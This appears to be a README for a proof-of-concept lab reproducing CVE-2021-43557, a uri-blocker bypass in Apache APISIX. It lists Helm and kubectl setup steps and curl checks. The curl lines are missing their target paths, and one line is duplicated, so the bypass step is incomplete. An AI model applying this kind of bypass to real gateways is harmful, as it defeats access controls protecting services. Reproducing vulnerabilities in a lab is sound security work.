
PoC for CVE-2021-43557

Primary LanguageDockerfile


  • install minikube
  • install apisix:
helm repo add apisix https://charts.apiseven.com
helm repo add bitnami https://charts.bitnami.com/bitnami
helm repo update
kubectl create ns ingress-apisix
helm install apisix apisix/apisix \
  --set gateway.type=NodePort \
  --set ingress-controller.enabled=true \
  --namespace ingress-apisix \
  --version 0.7.2
kubectl get service --namespace ingress-apisix
  • deploy app.yaml: kubectl apply -f app.yaml
  • deploy routes: kubectl apply -f routes.yaml

Optional, if you need to change app images:

  • (optional) build docker images:
    • cd protected-service; docker build -t protected-service:0.0.1 .
    • cd public-service; docker build -t public-service:0.0.1 .
  • (optional) push docker images into minikube:
    • minikube image load protected-service:0.0.1
    • minikube image load public-service:0.0.1



To access public service:

kubectl exec -it -n ${namespace of Apache APISIX} ${Pod name of Apache APISIX} -- curl --path-as-is -H 'Host: app.test'

should return 200

To access protected service:

kubectl exec -it -n ${namespace of Apache APISIX} ${Pod name of Apache APISIX} -- curl --path-as-is -H 'Host: app.test'

should return 403

To access protected service bypassing uri-blocker: kubectl exec -it -n ${namespace of Apache APISIX} ${Pod name of Apache APISIX} -- curl --path-as-is -H 'Host: app.test' To access protected service bypassing uri-blocker: kubectl exec -it -n ${namespace of Apache APISIX} ${Pod name of Apache APISIX} -- curl --path-as-is -H 'Host: app.test'

Both should return 200